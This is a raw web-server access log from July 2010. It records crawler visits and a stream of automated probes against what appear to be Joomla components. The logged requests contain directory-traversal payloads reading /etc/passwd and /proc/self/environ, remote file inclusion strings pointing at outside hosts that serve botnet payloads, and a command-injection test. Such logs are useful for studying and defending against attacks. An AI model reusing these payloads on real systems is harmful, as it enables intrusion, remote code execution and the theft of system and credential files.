67.195.112.178 - - [27/Jul/2010:05:09:55 +0200] "GET /?C=M;O=A HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.55.73.74 - - [27/Jul/2010:05:12:49 +0200] "GET /logs/error_log/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 318 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:05:12:49 +0200] "GET /become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 303 "-" "libwww-perl/5.810"
74.55.73.74 - - [27/Jul/2010:05:12:49 +0200] "GET /logs/become_editor.php?theme_path=http://porschesource.com/logs/myid.jpg? HTTP/1.1" 404 308 "-" "libwww-perl/5.810"
207.46.199.200 - - [27/Jul/2010:05:16:26 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
95.141.32.178 - - [27/Jul/2010:05:31:45 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:36:13 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:36:13 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:36:13 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:40:13 +0200] "GET /logs/access_log//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:40:13 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
95.141.32.178 - - [27/Jul/2010:05:40:13 +0200] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:05:42:57 +0200] "GET //index.php?option=com_janews&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:05:43:15 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:05:43:15 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:05:43:24 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:05:43:24 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:05:43:30 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:05:43:30 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
83.165.195.143 - - [27/Jul/2010:05:43:35 +0200] "GET /logs/access_log HTTP/1.0" 200 303106 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
119.192.145.144 - - [27/Jul/2010:06:07:04 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:11:41 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:11:42 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:11:42 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
67.195.112.178 - - [27/Jul/2010:06:12:35 +0200] "GET /logs/?C=D;O=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.149.14.77 - - [27/Jul/2010:06:15:59 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [27/Jul/2010:06:16:08 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
119.192.145.144 - - [27/Jul/2010:06:18:31 +0200] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:06:18:31 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:06:22:26 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:06:22:26 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
194.149.14.77 - - [27/Jul/2010:06:22:27 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
188.127.248.175 - - [27/Jul/2010:06:22:51 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:06:22:51 +0200] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [27/Jul/2010:06:22:52 +0200] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
94.23.215.207 - - [27/Jul/2010:06:31:55 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:06:31:56 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:06:33:43 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:06:33:44 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:06:33:58 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:06:33:59 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:06:34:19 +0200] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:06:34:19 +0200] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:34:24 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:06:34:29 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
95.211.71.21 - - [27/Jul/2010:06:52:38 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 319 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:52:38 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:52:38 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 335 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:52:38 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 319 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:52:38 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
95.211.71.21 - - [27/Jul/2010:06:52:38 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 335 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:06 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 319 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:07 +0200] "GET //components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 319 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:07 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:07 +0200] "GET /logs/access_log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 337 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:08 +0200] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 324 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:00:08 +0200] "GET /logs/access_log%20%20//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 337 "-" "MaMa CaSpEr"
87.98.217.83 - - [27/Jul/2010:07:01:55 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:07:01:55 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:07:01:55 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:07:01:55 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:07:01:55 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
87.98.217.83 - - [27/Jul/2010:07:01:55 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:07:04:06 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:07:08:46 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:09:38 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
188.165.213.8 - - [27/Jul/2010:07:11:42 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:07:11:42 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:07:11:42 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
114.108.151.149 - - [27/Jul/2010:07:14:52 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
69.175.118.101 - - [27/Jul/2010:07:15:30 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:15:30 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:15:30 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:16:07 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:16:07 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:16:07 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:18:24 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:18:24 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:18:24 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:27:15 +0200] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:27:15 +0200] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "oi"
69.175.118.101 - - [27/Jul/2010:07:27:15 +0200] "GET /logs/access_log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "oi"
114.108.151.149 - - [27/Jul/2010:07:32:48 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:07:32:49 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:07:32:49 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:36:13 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:36:14 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:07:36:16 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
209.126.254.12 - - [27/Jul/2010:07:44:15 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=http://mimi.fileave.com/botnet/Ckrid1.txt?? HTTP/1.1" 404 335 "-" "MaMa CaSpEr"
209.126.254.12 - - [27/Jul/2010:07:44:15 +0200] "GET /logs/access_log//components/com_jombib/BibTex.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 335 "-" "MaMa CaSpEr"
67.195.112.178 - - [27/Jul/2010:07:54:27 +0200] "GET /?C=S;O=D HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.211.71.21 - - [27/Jul/2010:08:09:35 +0200] "GET /logs/?INCLUDE_FOLDER=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 200 796 "-" "plaNETWORK Bot Search"
95.211.71.21 - - [27/Jul/2010:08:09:35 +0200] "GET /?INCLUDE_FOLDER=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 200 559 "-" "plaNETWORK Bot Search"
114.108.151.149 - - [27/Jul/2010:08:30:18 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:08:30:19 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:08:30:19 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.805"
80.249.165.44 - - [27/Jul/2010:08:44:18 +0200] "GET /logs/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:44:18 +0200] "GET /logs/access_log%20%20/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 313 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:08:44:18 +0200] "GET /index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 295 "-" "plaNETWORK Bot Search"
67.195.112.178 - - [27/Jul/2010:08:47:22 +0200] "GET /logs/?C=S;O=D HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.249.165.44 - - [27/Jul/2010:09:04:37 +0200] "GET /logs/access_log%20%20/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 313 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:04:37 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:04:37 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 295 "-" "plaNETWORK Bot Search"
188.165.213.8 - - [27/Jul/2010:09:08:11 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
80.249.165.44 - - [27/Jul/2010:09:08:17 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 295 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:08:17 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:08:17 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 311 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:13:44 +0200] "GET /index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 295 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:13:44 +0200] "GET /logs/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
80.249.165.44 - - [27/Jul/2010:09:13:44 +0200] "GET /logs/access_log/index.php?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 311 "-" "plaNETWORK Bot Search"
114.108.151.149 - - [27/Jul/2010:09:14:41 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:15:27 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
114.108.151.149 - - [27/Jul/2010:09:16:31 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.805"
87.118.67.13 - - [27/Jul/2010:09:24:32 +0200] "GET /index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
188.165.213.8 - - [27/Jul/2010:09:26:47 +0200] "GET /logs/access_log////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:09:26:48 +0200] "GET ////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:09:26:48 +0200] "GET /logs////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
87.118.67.13 - - [27/Jul/2010:09:33:12 +0200] "GET //web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:20 +0200] "GET /logs/access_log//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:20 +0200] "GET //web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:33:20 +0200] "GET /logs//web2/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:35:12 +0200] "GET /logs/access_log/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:35:12 +0200] "GET /index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:35:12 +0200] "GET /logs/index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:40:41 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:44:14 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:46:49 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:46:50 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
87.118.67.13 - - [27/Jul/2010:09:46:50 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
95.211.71.21 - - [27/Jul/2010:09:47:42 +0200] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.23.215.207 - - [27/Jul/2010:09:52:54 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:54 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:54 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:55 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:09:52:56 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
